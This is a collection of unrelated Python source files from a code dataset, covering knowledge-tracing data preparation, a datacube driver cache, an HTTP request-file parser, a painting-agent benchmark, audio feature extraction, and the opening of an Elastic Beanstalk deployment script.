# representation_obj['lstm-correct-incorrect'] = DKT(self.original_data, 'correct-incorrect','lstm')
representation_obj['w2v-withCorrectness'] = P2V('withCorrectness')
representation_obj['w2v-withoutCorrectness'] = P2V('withoutCorrectness')
self.representation_obj = representation_obj
def generate_representation(self, input_data):
""" Appending vectors for problem using W2V or RNN """
data_for_repr = input_data
repr_object = self.representation_obj[self.args.representation[0]]
if self.args.representation[0][:3] == "w2v":
param = {'ws':int(self.args.w2v_params[1]) , 'vs':int(self.args.w2v_params[0]), 'mt':1, 'mc':0, 'data_path':data_for_repr}
data_with_representation = repr_object.prob2vec(**param)
else:
param = {'activation':'linear', 'hidden_layer_size':int(self.args.rnn_params[0]), 'data':data_for_repr}
data_with_representation = repr_object.dkt_representation(**param)
return data_with_representation
def generate_Xmatrix(self, input_data):
""" Making Skill Model using problem vectors using clustering requires matlab """
data_for_qmatrix = input_data
if self.args.representation[0] is not None:
qmatrix_obj = Qmatrix(data=data_for_qmatrix, path=self.args.workingDir[0], ctype="kmeans", csize=self.args.clustering_params[0], distance=self.args.clustering_params[1], uid='3')
qmatrix_obj.problemvector()
qmatrix = qmatrix_obj.q_matrix()
X_new_skill = qmatrix_obj.main(self.original_data, qmatrix)
else:
X_new_skill = self.original_data
return X_new_skill
def generate_dkt(self, input_data):
dkt_obj = DKT(input_data, "rnn", "rnn")
input_dim = len(dkt_obj.p)
input_dim_order = len(dkt_obj.up)
training_data = input_data[input_data['user_id'].isin(self.user_train)]
testing_data = input_data[input_data['user_id'].isin(self.user_test)]
trainX, trainY, trainY_order = dkt_obj.dkt_data(training_data)
testX, testY, testY_order = dkt_obj.dkt_data(testing_data)
return [trainX, trainY, trainY_order, testX, testY, testY_order, input_dim, input_dim_order]
def generate_afm(self, input_data):
""" Generating data suitable for AFM model """
data_for_afm = input_data
x1, x2 = load_data(data_for_afm, self.user_train, self.user_test)
trainX, trainY = np.concatenate((x1[0], x1[1]), axis=1), x1[2]
testX, testY = np.concatenate((x2[1], x2[2]), axis=1), x2[3]
d_t = x2[0][0]
return [trainX, trainY, testX, testY, d_t]
def generate_dafm(self, input_data):
data_for_dafm = input_data
dafmdata_obj = DAFM_data(args=self.args, complete_data=data_for_dafm, user_train=self.user_train, user_test=self.user_test, df_user_responses=self.df_user_responses, path=self.args.workingDir[0]+self.args.dataset[0], section=self.args.section[0], use_batches=self.use_batches)
if self.args.skill_wise[0]=="True":
if (not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"skill_index.csv")) or (not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"problem_index.csv")):
d_skill = dafmdata_obj.d_skill
skills = []
index = []
for i,j in d_skill.items():
skills.append(i)
index.append(j)
if not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"):
os.makedirs(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/")
pd.DataFrame({"skills":skills, "index":index}).to_csv(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"skill_index.csv", sep=",", index=False)
d_problem = dafmdata_obj.d_problem
problems = [i for i,j in d_problem.items()]
index = [j for i,j in d_problem.items()]
if not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"):
os.makedirs(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/")
pd.DataFrame({"problem":problems, "index":index}).to_csv(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"problem_index.csv", sep=",", index=False)
if self.use_batches:
return [dafmdata_obj, {'Q_jk_initialize':dafmdata_obj.Q_jk_initialize, 'section_count':dafmdata_obj.section_count, 'student_count': len(dafmdata_obj.d_student)}]
else:
trainX, trainY, trainS, trainStudent, testX, testY, testS, testStudent = dafmdata_obj.data_generator()
return [trainX, trainY, trainS, trainStudent, testX, testY, testS, testStudent, {'Q_jk_initialize':dafmdata_obj.Q_jk_initialize, 'student_count': len(dafmdata_obj.d_student), 'section_count':dafmdata_obj.section_count}]
def main(self):
    # Generator driving the whole pipeline: load raw data, resolve the skill
    # model (learned representation vs. given skill names), build the X
    # matrix, then yield the prepared data for each enabled model
    # (DKT / AFM / DAFM) in turn.
    # original_data, df_user_responses = f(args=self.args, problem_hierarchy=self.args.unit[0], make_unit_users=self.args.unit_users[0])
    original_data, df_user_responses = f(args=self.args, make_unit_users=self.args.unit_users[0])
    self.df_user_responses = df_user_responses
    # "orig" uses the full user split files; anything else uses the "sub" files.
    temp = "" if self.args.puser[0] == "orig" else "sub"
    self.user_train = set(pd.read_csv(self.args.workingDir[0]+"datasets/" +self.args.dataset[0]+"/Users/"+temp+"train.csv", header=None)[0].map(str))
    self.user_test = set(pd.read_csv(self.args.workingDir[0]+"datasets/"+self.args.dataset[0]+"/Users/"+temp+"test.csv", header=None)[0].map(str))
    print ("users:",len(self.user_train), len(self.user_test))
    self.original_data = original_data
    # Keep only users that actually appear in the loaded response data.
    users = set(original_data["user_id"].map(str))
    self.user_train = list(users.intersection(self.user_train))
    self.user_test = list(users.intersection(self.user_test))
    if (not (self.args.representation[0] == None)):
        if "skill_name" not in original_data.columns:
            if type(self.args.clustering_params[0]) == int:
                self.args.clustering_params[0] = "integer_"+str(self.args.clustering_params[0])
            # Placeholder skill names; real ones come from the learned representation.
            original_data["skill_name"] = ["^"]*len(original_data)
        print ("Skill Model Using Word2Vec or DKT....")
        self.create_dict()
        data_with_repr = self.generate_representation(input_data=original_data)
    elif ("skill_name" in original_data.columns):
        print ("Skill Model Using ", self.args.skill_name[0], "....")
        data_with_repr = original_data
    else:
        print ("No skill model found")
        sys.exit()
    X_matrix = self.generate_Xmatrix(input_data=data_with_repr)
    if not (self.args.dkt[0]==None):
        print ('DKT loading data ....')
        yield self.generate_dkt(input_data=X_matrix)
    if not (self.args.afm[0]==None):
        print ('AFM loading data ....')
        yield self.generate_afm(input_data=X_matrix)
    if not (self.args.dafm[0]==None):
        print ('DAFM loading data ....')
        dg = self.generate_dafm(input_data=X_matrix)
        yield dg
| StarcoderdataPython |
267290 | <reponame>Zac-HD/datacube-core<gh_stars>1-10
from __future__ import absolute_import
from .driver_cache import load_drivers
class IndexDriverCache(object):
    """Cache of index drivers discovered for a given entry-point group."""

    def __init__(self, group):
        self._drivers = load_drivers(group)
        if not self._drivers:
            # Nothing was discovered via entry points: fall back to the
            # built-in default index driver.
            from datacube.index.index import index_driver_init
            self._drivers = dict(default=index_driver_init())
        # Register every alias a driver advertises as an extra lookup key.
        for driver in list(self._drivers.values()):
            for alias in getattr(driver, 'aliases', ()):
                self._drivers[alias] = driver

    def __call__(self, name):
        """
        :returns: None if driver with a given name is not found

        :param str name: Driver name
        :return: Returns IndexDriver
        """
        return self._drivers.get(name)

    def drivers(self):
        """ Returns list of driver names (including aliases)
        """
        return list(self._drivers)
def index_cache():
    """ Singleton accessor for the process-wide IndexDriverCache
    """
    # pylint: disable=protected-access
    if getattr(index_cache, '_instance', None) is None:
        # Lazily build the cache on first use and stash it on the function.
        index_cache._instance = IndexDriverCache('datacube.plugins.index')
    return index_cache._instance
def index_drivers():
    """ Returns the names of all available index drivers
    """
    cache = index_cache()
    return cache.drivers()
def index_driver_by_name(name):
    """ Lookup an index driver by name

    :returns: Initialised driver instance
    :returns: None if driver with this name doesn't exist
    """
    cache = index_cache()
    return cache(name)
| StarcoderdataPython |
9644930 | <reponame>watchdogoblivion/watchdogs-offsec<gh_stars>0
# author: WatchDogOblivion
# description: TODO
# WatchDogs Request Parser Service
import re
from collections import OrderedDict
from watchdogs.io.parsers import FileArgs
from watchdogs.base.models import AllArgs, Common
from watchdogs.utils.StringUtility import StringUtility
from watchdogs.web.models import WebFile
from watchdogs.web.parsers import RequestArgs
from watchdogs.web.models.Requests import Request
from watchdogs.utils.Constants import (EMPTY, HTTP, LFN, LFR, LR, SPACE, CONTENT_DISPOSITION, CONTENT_TYPE,
FILE_NAME, RB)
class RequestParserService(Common):
    """Parses a raw HTTP request file into a Request object.

    The file is split into the request line, the header block and the body;
    multipart bodies are further decomposed into form fields and file uploads.
    """
    # Multipart boundary token declared in the Content-Type header.
    BOUNDARY_REGEX = r'boundary=([-a-zA-Z0-9]*)(?:$| )'
    # Header name (before the colon) and header value (after the colon).
    KEY_REGEX = r'([-a-zA-Z0-9]+):'
    VALUE_REGEX = r':(.*)'
    # Content-Disposition attributes.
    NAME_REGEX = r' name="([^"]*)'
    FILENAME_REGEX = r' filename="([^"]*)'

    def __init__(self): #type: () -> None
        super(RequestParserService, self).__init__()

    def setBoundary(self, request, fileLine): #type: (Request, str) -> bool
        # Record the multipart boundary if this line declares one; returns
        # True once a boundary has been captured so the scan can stop.
        matchedBoundary = re.search(RequestParserService.BOUNDARY_REGEX, fileLine)
        if (matchedBoundary):
            request.setRequestBoundary(matchedBoundary.group(1))
            return True
        return False

    def isLineFeed(self, string): #type: (str) -> bool
        # True for a bare newline line (either the \n or \r\n constant).
        return string == LFN or string == LFR

    def setFields(self, request, fileLines): #type: (Request, str) -> None
        # Single pass over the file lines, splitting them into the raw
        # request line, raw header block, and raw body on the Request.
        fileLinesLength = len(fileLines)
        index = 0
        rawValue = EMPTY
        isBody = False
        boundarySet = False
        while (index < fileLinesLength):
            fileLine = fileLines[index]
            isLastIndex = index + 1 == fileLinesLength
            if (not boundarySet):
                boundarySet = self.setBoundary(request, fileLine)
            if (index == 0):
                # The first line must be the request line, e.g. "GET / HTTP/1.1".
                if (HTTP.upper() not in fileLine):
                    print("Please check file format and ensure that the first line contains the method,"
                          " endpoint and protocol.")
                    raise Exception("Illegal file format")
                request.setRawInfo(fileLine.strip())
                index += 1
                continue
            elif ((self.isLineFeed(fileLine) and not isBody) or (isLastIndex and not isBody)):
                # First blank line (or end of file) terminates the header block.
                isBody = True
                request.setRawHeaders(rawValue)
                rawValue = EMPTY
            elif (isLastIndex):
                # Last line while in the body: flush the accumulated body.
                rawValue += fileLine + LFN
                request.setRawBody(rawValue)
                index += 1
            rawValue += fileLine + LFN
            index += 1

    def parseInfo(self, requestArgs, request): #type: (RequestArgs, Request) -> None
        # Split the raw request line into method and endpoint; the host
        # comes from the command-line arguments, not the file.
        rawInfo = request.getRawInfo()
        requestInfo = request.getRequestInfo()
        rawInfoSplit = rawInfo.rstrip().split(SPACE)
        requestInfo.setUrlHost(requestArgs.remoteHost)
        requestInfo.setMethod(rawInfoSplit[0])
        requestInfo.setEndpoint(rawInfoSplit[1])
        request.setRequestInfo(requestInfo)

    def parseHeaders(self, request): #type: (Request) -> None
        # Convert the raw header block into a name -> value mapping,
        # silently skipping lines that do not look like headers.
        requestHeaders = request.getRequestHeaders()
        rawHeadersSplit = request.getRawHeaders().rstrip().split(LFN)
        for rawHeader in rawHeadersSplit:
            matchedKey = re.search(RequestParserService.KEY_REGEX, rawHeader)
            if (not matchedKey):
                continue
            matchedValue = re.search(RequestParserService.VALUE_REGEX, rawHeader)
            if (not matchedValue):
                continue
            headerKey = matchedKey.group(1)
            headerValue = matchedValue.group(1).strip()
            requestHeaders[headerKey] = headerValue
        request.setRequestHeaders(requestHeaders)

    def getRawBodyFiltered(self, request): #type: (Request) -> list[str]
        # Drop empty lines and multipart boundary lines from the raw body.
        rawBodyLines = request.getRawBody().split(LFN)
        requestBoundary = request.getRequestBoundary()
        filteredLines = []
        for rawBodyLine in rawBodyLines:
            if (rawBodyLine and not requestBoundary in rawBodyLine):
                filteredLines.append(rawBodyLine)
        return filteredLines

    def addWebFile(self, rawBodyLines, lineIndex, requestArgs, requestBody):
        #type: (list[str], int, RequestArgs, OrderedDict) -> None
        # Build a file-upload entry from a Content-Disposition line carrying
        # a filename; the actual file content is read from requestArgs.postFile.
        rawBodyLine = rawBodyLines[lineIndex]
        nameValue = re.search(RequestParserService.NAME_REGEX, rawBodyLine).group(1)
        fileNameValue = re.search(RequestParserService.FILENAME_REGEX, rawBodyLine).group(1)
        contentTypeValue = None
        nextLine = rawBodyLines[lineIndex + 1]
        if (CONTENT_TYPE in nextLine):
            contentTypeValue = re.search(RequestParserService.VALUE_REGEX, nextLine).group(1)
        webFile = (fileNameValue, open(requestArgs.postFile, RB).read(), contentTypeValue)
        requestBody[nameValue] = WebFile(webFile)

    def addDispositionValues(self, rawBodyLines, lineIndex, requestBody):
        #type: (list[str], int, OrderedDict) -> None
        # Collect the value lines following a plain (non-file)
        # Content-Disposition entry, up to the next entry or end of body.
        rawBodyLine = rawBodyLines[lineIndex]
        nameValue = re.search(RequestParserService.NAME_REGEX, rawBodyLine).group(1)
        dispositionValue = EMPTY
        nextIndex = lineIndex + 1
        rawBodyLinesLength = len(rawBodyLines)
        while (True):
            dispositionValue += rawBodyLines[nextIndex] + LFN
            nextLine = EMPTY
            nextIndex += 1
            if (nextIndex < rawBodyLinesLength):
                nextLine = rawBodyLines[nextIndex]
            if (nextIndex == rawBodyLinesLength or CONTENT_DISPOSITION in nextLine):
                requestBody[nameValue] = dispositionValue.rstrip()
                break

    def parseBody(self, requestArgs, request): #type: (RequestArgs, Request) -> None
        # Multipart bodies become an ordered dict of fields/files; any other
        # body is kept verbatim as a string.
        if (requestArgs.postFile or requestArgs.multiPart):
            rawBodyLines = self.getRawBodyFiltered(request)
            rawBodyLinesLength = len(rawBodyLines)
            for lineIndex in range(rawBodyLinesLength):
                rawBodyLine = rawBodyLines[lineIndex]
                requestBody = request.getRequestBodyDict()
                if (FILE_NAME in rawBodyLine):
                    self.addWebFile(rawBodyLines, lineIndex, requestArgs, requestBody)
                elif (CONTENT_DISPOSITION in rawBodyLine):
                    self.addDispositionValues(rawBodyLines, lineIndex, requestBody)
                request.setRequestBodyDict(requestBody)
            if (not request.getRequestBodyDict()):
                print(
                    "Could not parse the post file specified. Please ensure that the -pf flag is being used with"
                    " a proper file upload request. If the attempted request is not a file upload, then remove the -pf"
                    " flag to send JSON or standard form data.")
                exit()
        else:
            request.setRequestBodyString(StringUtility.stringDoublePrefix(request.getRawBody()))

    def parseFile(self, allArgs): # type: (AllArgs) -> Request
        """Parse the input file named in allArgs into a Request object."""
        requestArgs = allArgs.getArgs(RequestArgs)
        inputFile = open(allArgs.getArgs(FileArgs).getInputFile(), LR)
        inptFileLines = inputFile.readlines()
        request = Request()
        self.setFields(request, inptFileLines)
        self.parseInfo(requestArgs, request)
        self.parseHeaders(request)
        self.parseBody(requestArgs, request)
        return request
11303199 | <gh_stars>100-1000
import cv2
import torch
import random
import numpy as np
from .baseline.Renderer.model import FCN
from .baseline.DRL.evaluator import Evaluator
from .baseline.utils.util import *
from .baseline.DRL.ddpg import DDPG
from .baseline.DRL.multi import fastenv
from ...util.model import BenchmarkModel
from torchbenchmark.tasks import REINFORCEMENT_LEARNING
from argparse import Namespace
# Fix the RNG seeds so benchmark runs are reproducible.
torch.manual_seed(1337)
np.random.seed(1337)
# Allow cudnn to autotune kernels (benchmark=True) at the cost of
# bit-exact determinism across runs.
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
class Model(BenchmarkModel):
    """Benchmark wrapper around the ICCV'19 LearningToPaint DDPG agent."""
    task = REINFORCEMENT_LEARNING.OTHER_RL

    def __init__(self, device=None, jit=False, train_bs=96, eval_bs=96):
        super(Model, self).__init__()
        self.device = device
        self.jit = jit
        # Train: These options are from source code.
        # Source: https://arxiv.org/pdf/1903.04411.pdf
        # Code: https://github.com/megvii-research/ICCV2019-LearningToPaint/blob/master/baseline/train.py
        self.args = Namespace(**{
            'validate_episodes': 5,
            'validate_interval': 50,
            'max_step': 40,
            'discount': 0.95**5,
            'episode_train_times': 10,
            'noise_factor': 0.0,
            'tau': 0.001,
            'rmsize': 800,
        })
        self.train_bs = train_bs
        self.eval_bs = eval_bs
        # Train: input images are from CelebFaces and resized to 128 x 128.
        # Create 2000 random tensors for input, but randomly sample 200,000 images.
        self.width = 128
        self.image_examples = torch.rand(2000, 3, self.width, self.width)
        # LearningToPaint includes actor, critic, and discriminator models.
        # Separate env/agent/evaluator instances are kept for training and
        # inference so the two phases do not share state.
        self.Decoder = FCN()
        self.train_env = fastenv(max_episode_length=self.args.max_step, env_batch=self.train_bs,
                                 images=self.image_examples, device=self.device, Decoder=self.Decoder)
        self.train_agent = DDPG(batch_size=self.train_bs, env_batch=self.train_bs,
                                max_step=self.args.max_step, tau=self.args.tau, discount=self.args.discount,
                                rmsize=self.args.rmsize, device=self.device, Decoder=self.Decoder)
        self.train_evaluate = Evaluator(args=self.args, env_batch=train_bs, writer=None)
        self.train_agent.train()
        self.infer_env = fastenv(max_episode_length=self.args.max_step, env_batch=self.eval_bs,
                                 images=self.image_examples, device=self.device, Decoder=self.Decoder)
        self.infer_agent = DDPG(batch_size=self.eval_bs, env_batch=self.eval_bs,
                                max_step=self.args.max_step, tau=self.args.tau, discount=self.args.discount,
                                rmsize=self.args.rmsize, device=self.device, Decoder=self.Decoder)
        self.infer_evaluate = Evaluator(args=self.args, env_batch=eval_bs, writer=None)
        self.infer_agent.eval()
        self.step = 0
        # Prime both environments and agents with an initial observation.
        self.train_observation = self.train_env.reset()
        self.infer_observation = self.infer_env.reset()
        self.train_agent.reset(self.train_observation, self.args.noise_factor)
        self.infer_agent.reset(self.infer_observation, self.args.noise_factor)

    def get_module(self):
        # Take one environment step to fill the replay memory, then sample a
        # batch and return the actor network with a ready-made input state.
        action = self.train_agent.select_action(self.train_observation, noise_factor=self.args.noise_factor)
        self.train_observation, reward, done, _ = self.train_env.step(action)
        self.train_agent.observe(reward, self.train_observation, done, self.step)
        state, action, reward, \
            next_state, terminal = self.train_agent.memory.sample_batch(self.train_bs, self.device)
        # Actor input: normalized canvas/target channels, normalized step
        # counter, and the coordinate grid broadcast over the batch.
        state = torch.cat((state[:, :6].float() / 255, state[:, 6:7].float() / self.args.max_step,
                           self.train_agent.coord.expand(state.shape[0], 2, 128, 128)), 1)
        return self.train_agent.actor, (state, )

    def train(self, niter=1):
        if self.jit:
            raise NotImplementedError()
        episode = episode_steps = 0
        for _ in range(niter):
            episode_steps += 1
            if self.train_observation is None:
                # Start a fresh episode.
                self.train_observation = self.train_env.reset()
                self.train_agent.reset(self.train_observation, self.args.noise_factor)
            action = self.train_agent.select_action(self.train_observation, noise_factor=self.args.noise_factor)
            self.train_observation, reward, done, _ = self.train_env.step(action)
            self.train_agent.observe(reward, self.train_observation, done, self.step)
            if (episode_steps >= self.args.max_step and self.args.max_step):
                # [optional] evaluate
                if episode > 0 and self.args.validate_interval > 0 and \
                        episode % self.args.validate_interval == 0:
                    reward, dist = self.train_evaluate(self.train_env, self.train_agent.select_action)
                tot_Q = 0.
                tot_value_loss = 0.
                # (actor lr, critic lr) for the policy update.
                lr = (3e-4, 1e-3)
                for i in range(self.args.episode_train_times):
                    Q, value_loss = self.train_agent.update_policy(lr)
                    tot_Q += Q.data.cpu().numpy()
                    tot_value_loss += value_loss.data.cpu().numpy()
                # reset
                self.train_observation = None
                episode_steps = 0
                episode += 1
            self.step += 1

    def eval(self, niter=1):
        if self.jit:
            raise NotImplementedError()
        for _ in range(niter):
            reward, dist = self.infer_evaluate(self.infer_env, self.infer_agent.select_action)

    # Using separate models for train and infer, so skip this function.
    def _set_mode(self, train):
        pass
if __name__ == '__main__':
    # Smoke-test on CPU: train for 100 steps, evaluating whenever the step
    # counter hits a multiple of 100.
    model = Model(device='cpu', jit=False)
    module, example_inputs = model.get_module()
    while model.step < 100:
        model.train(niter=1)
        if model.step % 100 == 0:
            model.eval(niter=1)
        model.step += 1
| StarcoderdataPython |
67661 | <reponame>lcn-kul/conferencing-speech-2022<filename>src/data/extract_features/extract_features.py
import csv
import librosa
import numpy as np
from pathlib import Path
import soundfile as sf
import torch
from torchaudio.transforms import ComputeDeltas, MFCC
from transformers import Wav2Vec2FeatureExtractor, Wav2Vec2Model, AutoModel
from tqdm.auto import tqdm
from src import constants
from src.utils.run_once import run_once
from src.utils.split import Split, ALL_SPLITS, DEV_SPLITS
from src.utils.csv_info import STANDARDIZED_CSV_INFO
from src.utils.full_path import full_path
def _decode_non_mp3_file_like(file, new_sr):
    """Load an audio file as a mono waveform, resampling to *new_sr* if needed.

    Adapted from the HuggingFace `datasets` Audio feature:
    https://huggingface.co/docs/datasets/_modules/datasets/features/audio.html#Audio
    """
    samples, native_sr = sf.read(file)
    # soundfile returns (frames, channels); transpose before downmixing.
    samples = librosa.to_mono(samples.T)
    if new_sr and new_sr != native_sr:
        samples = librosa.resample(
            samples,
            orig_sr=native_sr,
            target_sr=new_sr,
            res_type="kaiser_best"
        )
        native_sr = new_sr
    return samples, native_sr
def _extraction_progress_path(split: Split, example: bool, partition_idx: int, num_partitions: int) -> Path:
    """Return the flag-file path that tracks feature-extraction progress."""
    # Name pieces: base, split name, optional "example", optional partition tag.
    pieces = ["extract_features_progress", str(split).lower().split(".")[1]]
    if example:
        pieces.append("example")
    if num_partitions != 1:
        pieces.append(f"{partition_idx}-{num_partitions}")
    return constants.DIR_DATA_FLAGS.joinpath("_".join(pieces))
def _get_extraction_progress(split: Split, example: bool, partition_idx: int, num_partitions: int) -> int:
    """Return the most recent finished sample index, or -1 when no progress exists."""
    progress_path = _extraction_progress_path(
        split, example, partition_idx, num_partitions)
    if not progress_path.exists():
        return -1
    with open(progress_path, mode="r", encoding="utf8") as f:
        return int(f.readline())
def _write_extraction_progress(split: Split, example: bool, partition_idx: int, num_partitions: int, finished_idx: int):
    """Persist *finished_idx* as the latest completed sample for this partition."""
    progress_path = _extraction_progress_path(
        split, example, partition_idx, num_partitions)
    with open(progress_path, mode='w', encoding="utf8") as out:
        out.write(str(finished_idx))
def _extract_features(split: Split, example: bool, partition_idx: int = 0, num_partitions: int = 1):
    """Compute and save MFCC, extended-MFCC and wav2vec2/XLS-R features for
    every audio file of one dataset split, resumable per partition."""
    # Returns a constants.DatasetDir containing information about the dataset.
    dataset = constants.get_dataset(split, example)
    # Load progress for this partition and for the single partition.
    finished_idx = _get_extraction_progress(
        split, example, partition_idx, num_partitions)
    single_idx = _get_extraction_progress(split, example, 0, 1)
    # For printing...
    split_name = str(split).lower().split(".")[1]
    example_str = "(example) " if example else ""
    print(f"{example_str}Extracting features for {split_name} set.")
    # MODEL REQUIRES 16 kHz SAMPLING RATE.
    SAMPLING_RATE = 16_000
    # Device for model computations.
    if torch.cuda.is_available():
        device = "cuda"
    else:
        device = "cpu"
    print(f"{example_str}Using: %s" % device)
    # Create model.
    print(f"{example_str}Loading model...")
    feature_extractor = Wav2Vec2FeatureExtractor(
        feature_size=1,
        sampling_rate=SAMPLING_RATE,
        padding_value=0.0,
        do_normalize=True,
        return_attention_mask=True
    )
    # Prefer a locally cached XLS-R checkpoint; otherwise download from the hub.
    if constants.XLSR_DIR.exists():
        model = AutoModel.from_pretrained(str(constants.XLSR_DIR))
    else:
        model = Wav2Vec2Model.from_pretrained(f"facebook/{constants.XLSR_NAME}")
    model = model.to(device)
    # Create MFCC calculator.
    print(f"{example_str}Creating MFCC components...")
    calculate_mfcc = MFCC(sample_rate=SAMPLING_RATE)
    # Create MFCC Delta calculator.
    compute_deltas = ComputeDeltas(win_length=5, mode='replicate')
    # Load CSV rows.
    rows = []
    with open(dataset.csv_path, encoding="utf8", mode="r") as in_csv:
        csv_reader = csv.reader(in_csv)
        for idx, row in enumerate(csv_reader):
            # Skip header row & empty rows.
            if idx == 0 or len(row) == 0:
                continue
            # Append row.
            rows.append(row)
    # Which rows should be processed by the partition.  If a previous
    # single-partition run already finished some rows, only the remainder
    # is divided among the partitions.
    if single_idx == -1:
        partition_start = int(partition_idx/num_partitions * len(rows))
        partition_end = int((partition_idx+1)/num_partitions * len(rows))
    else:
        new_len = len(rows) - (single_idx+1)
        partition_start = int(partition_idx/num_partitions * new_len)
        partition_start += single_idx+1
        partition_end = int((partition_idx+1)/num_partitions * new_len)
        partition_end += single_idx+1
    print(f"Processing sample {partition_start}..{partition_end-1}")
    # ======================================================================= #
    #                           CALCULATE FEATURES                            #
    # ======================================================================= #
    print(f"{example_str}Calculating features for {len(rows)} audio files...")
    write_progress_freq = 10
    for idx, row in enumerate(tqdm(rows)):
        # Skip indices that are not for this partition.
        if idx < partition_start:
            continue
        if idx >= partition_end:
            continue
        # These have already been completed.
        if idx <= finished_idx:
            continue
        # Extract paths.
        audio_path = row[STANDARDIZED_CSV_INFO.col_audio_path]
        mfcc_path = row[STANDARDIZED_CSV_INFO.col_mfcc_path]
        mfcc_ext_path = row[STANDARDIZED_CSV_INFO.col_mfcc_ext_path]
        xlsr_path = row[STANDARDIZED_CSV_INFO.col_xlsr_path]
        # Load audio.
        audio_data_np, _ = _decode_non_mp3_file_like(
            full_path(audio_path), SAMPLING_RATE)
        audio_data_np = np.float32(audio_data_np)
        audio_data_pt = torch.from_numpy(audio_data_np)
        # Calculate wav2vec2 vector.
        inputs = feature_extractor(
            audio_data_pt,
            sampling_rate=SAMPLING_RATE,
            return_tensors="pt"
        )
        input = inputs["input_values"].to(device)
        with torch.no_grad():
            output = model(input)
        xlsr: torch.Tensor = output.last_hidden_state.squeeze().cpu()
        # MFCC (and deltas)
        mfcc: torch.Tensor = calculate_mfcc(audio_data_pt)
        mfcc_d: torch.Tensor = compute_deltas(mfcc)
        mfcc_d2: torch.Tensor = compute_deltas(mfcc_d)
        mfcc_ext = torch.concat((mfcc, mfcc_d, mfcc_d2))
        # Transpose MFCC from (n_mfcc, T) to (T, n_mfcc).
        # This will match the wav2vec2 size of (T, 1024).
        mfcc = mfcc.permute((1, 0))
        mfcc_ext = mfcc_ext.permute((1, 0))
        # Save results to .pt files.
        torch.save(mfcc, full_path(mfcc_path))
        torch.save(mfcc_ext, full_path(mfcc_ext_path))
        torch.save(xlsr, full_path(xlsr_path))
        # Finished this index; checkpoint progress every few samples.
        if idx % write_progress_freq == write_progress_freq - 1:
            _write_extraction_progress(
                split, example, partition_idx, num_partitions, idx)
    print("")
    print(f"{example_str}Finished.")
def extract_features(split: Split, example: bool, partition_idx: int = 0, num_partitions: int = 1):
    """Run feature extraction exactly once per (split, example) combination."""
    split_name = str(split).lower().split(".")[1]
    example_str = "(example) " if example else ""
    # Flag name. Make sure this operation is only performed once.
    flag_name = "extracted_features_" + split_name + ("_example" if example else "")
    # Special case: subset splits reuse the features of the main datasets,
    # otherwise we would extract the same features twice.
    if split in (Split.TRAIN_SUBSET, Split.VAL_SUBSET):
        print(f"{example_str}Feature extraction not needed for {split_name} split.")
        return
    # Run exactly once.
    with run_once(flag_name, partition_idx, num_partitions) as should_run:
        if not should_run:
            print(f"{example_str}Features already extracted for {split_name} split.")
        else:
            _extract_features(split, example, partition_idx, num_partitions)
if __name__ == "__main__":
example: bool = True
for split in DEV_SPLITS:
extract_features(split, example, partition_idx=0, num_partitions=1)
| StarcoderdataPython |
8068893 | from django.contrib import admin
from .models import StudentDataDropout
# Register your models here.
# Expose StudentDataDropout in the Django admin with the default ModelAdmin.
admin.site.register(StudentDataDropout)
11253558 | <gh_stars>0
"""Tests for filewriter.py
"""
| StarcoderdataPython |
9699196 | <filename>eb_deployer/eb_deployer.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This is the eb deploy application for manheim hello world app
from progress.spinner import Spinner
from subprocess import Popen, PIPE
import boto3
import os
import os.path
import time
# AWS Elastic Beanstalk API client (uses the default boto3 credential chain).
client = boto3.client('elasticbeanstalk')
current_directory = os.getcwd() # used as app name and environment
git_directory = os.path.join(current_directory, '.git')
eb_directory = os.path.join(current_directory, '.elasticbeanstalk')
# The app is named after the working directory; underscores become dashes so
# the name is usable as an environment name and CNAME prefix.
app_name = current_directory.split('/')[-1]
environment_name = (app_name.replace('_', '-'))
solution_stack = '64bit Amazon Linux 2016.03 v2.1.3 running Python 2.7'
application_path = current_directory + '/application.py'
# test if there is a .git folder; if not, then there is no repo, so exit
if not os.path.exists(git_directory):
    print("\n==>Cannot create Elastic Beanstalk app.")
    print("==>Run 'git init' first, then tag a branch.")
    exit(1)
def get_latest_tag():
    """Return the most recent reachable git tag for the current repository.

    Runs ``git describe --tags --candidates 1`` and returns its stripped
    stdout as a string.  Prints the error and returns None when git fails.
    """
    # stderr must be PIPE'd, otherwise the error branch can never trigger
    # (the original code left stderr unpiped, so communicate() always
    # returned None for it).  universal_newlines gives str, not bytes, so
    # the tag can be interpolated into the `eb deploy` command.
    p = Popen('git describe --tags --candidates 1',
              shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE,
              universal_newlines=True)
    out, err = p.communicate()
    # Use value comparison, not identity (`is not 2` on an int is an
    # implementation detail), and rely on the exit code / stderr for failure.
    if p.returncode != 0 or err:
        print("\n==>Error retrieving latest tag: {}\n".format(err))
        return None
    return out.strip()
def create_eb_environment():
    """
    Create an environment for the application.
    This is where the scaling options are set (up to 3 instances),
    based on CPU utilization.

    Returns the raw boto3 ``create_environment`` response dict.
    """
    creation_response = client.create_environment(
        ApplicationName=app_name,
        EnvironmentName=environment_name,
        Description="Manheim test deployment",
        CNAMEPrefix=environment_name,
        Tier={
            'Name': 'WebServer',
            'Type': 'Standard'
        },
        SolutionStackName=solution_stack,
        OptionSettings=[
            # --- Auto Scaling group: 1-3 t2.micro instances in us-east-1a ---
            {
                'Namespace': 'aws:autoscaling:asg',
                'OptionName': 'Custom Availability Zones',
                'ResourceName': 'AWSEBAutoScalingGroup',
                'Value': 'us-east-1a'
            },
            {
                'Namespace': 'aws:autoscaling:asg',
                'OptionName': 'MaxSize',
                'ResourceName': 'AWSEBAutoScalingGroup',
                'Value': '3'
            },
            {
                'Namespace': 'aws:autoscaling:asg',
                'OptionName': 'MinSize',
                'ResourceName': 'AWSEBAutoScalingGroup',
                'Value': '1'
            },
            {
                'Namespace': 'aws:autoscaling:launchconfiguration',
                'OptionName': 'InstanceType',
                'Value': 't2.micro'
            },
